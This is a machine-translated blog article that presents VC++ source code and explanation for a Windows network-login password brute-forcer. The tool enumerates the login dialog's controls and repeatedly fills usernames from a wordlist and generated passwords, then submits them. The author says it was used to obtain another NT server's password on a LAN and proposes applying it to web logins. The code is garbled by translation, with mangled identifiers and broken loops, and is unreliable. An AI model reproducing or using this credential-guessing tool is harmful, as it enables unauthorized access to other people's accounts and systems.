***** WINDOWS network user login password's guess (VC ++) *****

zhaozj2021-02-08  238

WINDOWS network user login password guess

The main idea of ​​the Windows network user password guess algorithm is to use the window enumeration functions provided by Windows to find the network login window. Use the sub-window enumeration function EnumChildWindows () or getNext-DLGTabItem () and getWindowlong () to locate the various controls on the network login window. Enter the username and password using SenddlgiteMmessage () or setdlgitemtext (). Send the "OK" message using SendMessage (). In this way, the entire network login process is completed using the program. In the process of repeating this process, the username and password are used, thereby completing the enumeration susceptibility of the network username and password.

First, guess the process of process:

To illustrate the problem, only the main process is written below. The source code implemented with VC is given to the critical process. The code between MUTEX.LOCK and MUTEX.UNLOCK is only allowed to be single-threaded access in the following procedure. "Password enumeration" means that the user specified by the user has been enumerated, and the program will re-enumerate this character collection. For specific usage of each function in the source code, see MSDN. For multi-threaded usage, refer to "Visualc Technical Insider".

The source code for key processes is given below (see Figure 1-1 of Figure 1-1):

1. Global variable:

Struct_thread

{

CWINTHREAD * PTHREAD;

}

_Thread windowThread [iProc], PASSTREAD [1], useertread [1];) // iproc: window enumeration thread

CEVENT geventnextPass; // Remove a password to import synchronization

CEVENT geventPassok; // has obtained a password to introduce synchronization

CEVENT geventnextuser; // Remove a username, introduce synchronization

CEVENT geventuserok; // has obtained username to introduce synchronization

Cmutex gmutex; // mutually exclusive, only single-threaded access

Char ccurrentpass [MAX_PASSWORD_LENGTH]; file: // Currently used password.

Char ccurrentuser [MAX_USER_LENGTH]; // Currently used username

2. Thread start:

{

File: // Password enumeration thread

IF (PASSTREAD [0] .pthread == null)

{

PASSTREAD [0] .pthread = AFXBEGINTHREAD ((AFX_THREADPROC) GetNextPassl, Null,

Thread_priority_lowest);

PASSTREAD [0] .pthread-> m_bautodelete = true;

File: // 代 取 取 码 码 码 码 码 码 差 差 差 差

}

FILE: // Username Enumeration Thread

IF (userTread [0] .pthread == NULL)

{

Usertread [0] .pthread = AfXbeginthread ((AFX_THREADPROC) GetNextuserf, Null,

Thread_priority_lowest);

PASSTREAD [0] .pthread-> m_bautodelete = true;

}

File: // Window enumeration thread

For (int i = 0; i

{

IF (WindowThread [i] .pthread == NULL) {

WindowThread [i] .pthread = AFXBEGINTHREAD ((AFX_THREADPROC) Threadproc, NULL,

Thread_priority_lowest; windowthread [i] .pthread-> m_bautodelete = true;

}

}

3. Window and sub-window enumeration

Uint ThreadProc (LPVOID * PPRARAM)

{

While (1) {while (! Enumwindows ((WndenumProc) EnumWindowsProc, Null) Break;}

Return 0;

}

Bool Callback EnumwindowsProc (HWND HWND, LPARAM LPARAM)

{

Char lpwintitle [max_LINELENGTH];

:: getWindowText (hwnd, lpwintitle, max_LINELEngth-1);

IF (Strcmp (LPwintitle, Stitle) == 0) // Stitle: Window name of the network login window

{GMutex.lock (Infinite); / / Prevent two threads from operating simultaneously

While (EnumchildWindows (HWnd, (WndenumProc) ENUMCHILDPROC, NULL);

Gmutex.unlock ();

Return False;

}

Return True;

}

Bool Callback EnumchildProc (HWND HWND, LPARAM LPARAM)

{

Char SchildName [MAX_LINELENGTH];

:: getclassname (hwnd, schildname, max_linength-1);

File: // Process the editing control, the login window is usually only two edit boxes, and the window can be viewed with Microsoft SPY .

File: // Each sub-window

// 's properties. By comparing the style or name of each control, each control is distinguished.

IF (STRCMP (SchildName, "Edit") == 0)

{

DWORD dwinsty = :: getwindowlong (hwnd, gwl_style);

IF (DWInSty & Es_Password) == ES_PASSWORD) // This is a password input editing control

{

geventnextPass.sevent (); // Send "New Password" event

WaitforsingleObject (geventPassok, Infinite); file: // Waiting for "Password Complete" event

GeventPassok.RsetEvent (); file: // Reset

:: setdlgitemtext (:: getwindowlong (hwnd, gwl_id), ccurrentpass;

File: // Fill in the new password into the password input box, or use setWindowText ()

BPASS = true; // Recording password has been filled in

IF (Buser && (Hok! = null) // If the username has been filled, the "OK" button is found.

{

:: SendMessage (:: getParent (HOK), WM_COMMAND,

(Wparam) :: getWindowlong (HOK, GWL_ID), (LPARAM) (HOK);

FILE: / / Send a message to "OK" button, refer to the message mapping of ClassWizard

Buser = false; bpass = false; hok = NULL;

File: // Complete a login, initialize

Return False;

}

Return True;

}

File: // Not this is, this is the username input editing control

IF (DWInsty & Es_Readonly)! = es_readonly)

{

:: setdlgitemtext (:: getWindowl ", ccurrentpass; file: // fills the new user name into the username input box, or setwindowText ()

Buser = true; // New username has been filled in the username input box

IF (BPASS & & (NUK! = NULL)) If the password has been filled, the "OK" button is found.

{

:: SendMessage (:: getParent (HOK), WM_COMMAND,

(Wparam) :: getWindowlong (HOK, GWL_ID), (LPARAM) (HOK);

FILE: / / Send a message to "OK" button, refer to the message mapping of ClassWizard

Buser = false; bpass = false; hok = NULL;

File: // Complete a login, initialize

Return False;

}

}

Return True;

}

FILE: // If you are a button control

IF (STRCMP (SchildName, "Button") == 0)

{

Char SchildTitle [MAX_LINELENGTH];

:: getWindowText (HWND, Schildtitle, Max_LINELENGTH-1);

IF (STRCMP (Schildtitle, SButtonok)! = 0) Return True;

// SBUTTONOK: Title of the "OK" button in the login window

HOK = hwnd; // Record "OK" window handle

Buser && bpass

{

:: SendMessage (:: getParent (HOK), WM_COMMAND,

(Wparam) :: getWindowlong (HOK, GWL_ID), (LPARAM) (HOK);

FILE: / / Send a message to "OK" button, refer to the message mapping of ClassWizard

Buser = false; bpass = false; hok = NULL;

File: // Complete a login, initialize

Return False;

}

Return True;

}

Return True;

}

4. User name enumeration:

Uint getNextUserf (file * file)

{

Char cusend [max_linelarngth], * token;

FILE * FUSER;

INT I, FLAG = 0;

IF (null == (FUSER = FOPEN (SUSERROAD, "R "))) File: // SUSERROAD: is the path and file name of the username

{

MessageBox (getActiveWindow (), "Error when opening files.", "Message", 0);

IF (Fuser! = NULL) Fclose (FUSER);

Return 0;

}

While (! feof (fuse))

{

For (i = 0; i

IF (null == fgets (cuser, max_linelarngth, fuse))

{

BCheckuser = false; // Record the username enumeration

Fclose (FUSER);

Return 0;

}

Token = strook (cuser, setprate); // #define setprate "/ t / n / r"

DO

{

WaitForsingleObject (geventnextuser, infinite);

// Wait for "new user name" event

geventnextuser.RsetEvent (); // Reset.

For (i = 0; i

STRCPY (CCURRENTUSER, TOKEN); // Change the current username. geventuserok.sevent (); // Send "User Name Complete" event

} while ((token = strook (null, setprate)))! = null);

}

Return 1;

}

5. Password enumeration:

Uint getNextPassl (LPVOID PPARAM)

{

INT I, J, IPRE;

Char CBUF [MAX_PASSWORD_LENGTH];

Begin:

For (int m = 0; M

{

File: // char ccurrentcharlist [MAX_CHARLIST_LENGTH]: Current password constitutive character set list

File: //, for example: ccurrentcharlist = "abcd": indicating that the enumeration is composed of ABCD

File: // int ccurrentpclist [MAX_CHARLIST_LENGTH]: Pointing the current password

File: // Compose a list of characters collection list

File: // For example: 4444: Indicates that the generated password is "DDDD",

File: // 4231: Indicates that the generated password is "dbca" ......

Ccurrentpclist [M] = iCharcount;

// iCharcount: The number of characters that make up characters

}

While (ccurrentpclist [0]> = 0) // If curlist.ccurrentpclist [0] <0 ends

{

For (int N = 0; N

While (1)

{

For (i = 0; i

{

CBUF [i] = ccurrentcharlist [ccurrentpclist [i]];

}

WaitforsingleObject (geventnextpass, infinite);

// Wait for "new password" event

geventnextPass.RsetEvent (); // Reset.

For (int N = 0; N

STRCPY (CCURRENTPASS, CBUF); // Change the current password.

geventPassok.sevent (); // Send password to complete events

File: // Perform the process of ccurrentpclist arrays.

IF ((ccurrentpclist [i-1] -) == 0) BREAK;

}

File: // Last bit ipharcount ;;

CcurrentpClist [i-1] = iCharcount;

Ipre = 1; // borrowing sign

For (j = i-2; j> = 0; J -)

{

IF ((ccurrentpclist [j] - = ipre) <0)

{

IF (j == 0) BREAK; // ends.

Ccurrentpclist [J] = iCharcount; ipre = 1; // Reset J, upward borrowing.

}

Else {ipre = 0; Continue;} // Don't borrow it again.

}

}

IF (ccurrentpclist [0] <= 0)

{

File: // Reset, go to the next loop.

If (! bCheckuser) // If the username enumeration

{

MessageBox (GetActiveWindow (), "All usernames and passwords have been enumerated.", "Messages", 0);

Return 0;

}

geventnextuser.sevent (); // Send "New User Name" event

WaitForsingleObject (geventuserok, infinite);

File: // Wait for "username to complete" event

Geventuserok.resetEvent (); // Reset. Goto Begin;

}

Return 0;

}

Second, the application of the LAN and the interconnection network:

The author uses software written in accordance with the above algorithm, successfully acquiring the password of another WindowsNT server from the WINDOWSNT workstation on a local area network. It is also possible to prepare software that derive interconnect online passwords can also be used with this algorithm. The key problem is how to locate the username input box and password input box and the "OK" button in the web page.

Third, there is a problem and solution:

In the 10M / 100M LAN, after the WindowsNT server fails, it will pop up the network login dialog again after about 0.7 seconds. This time overhead severely restricts the speed of the suspected. Commercial solution is to open multiple network login dialogs at the same time (from "network neighbor" while opening a network login dialog box), which can be used to improve the speed of the suspected, but still too slow . In addition, several computers can be used at the same time. As for the suspect interconnect online password, the speed can be imagined. But it doesn't matter, many passwords are numbers, more passwords do not exceed 26 characters plus 10 numbers. Moreover, people use these 26 characters and 10 numbers of frequencies that can be used first in the enumeration.

转载请注明原文地址:https://www.9cbs.com/read-3274.html

New Post(0)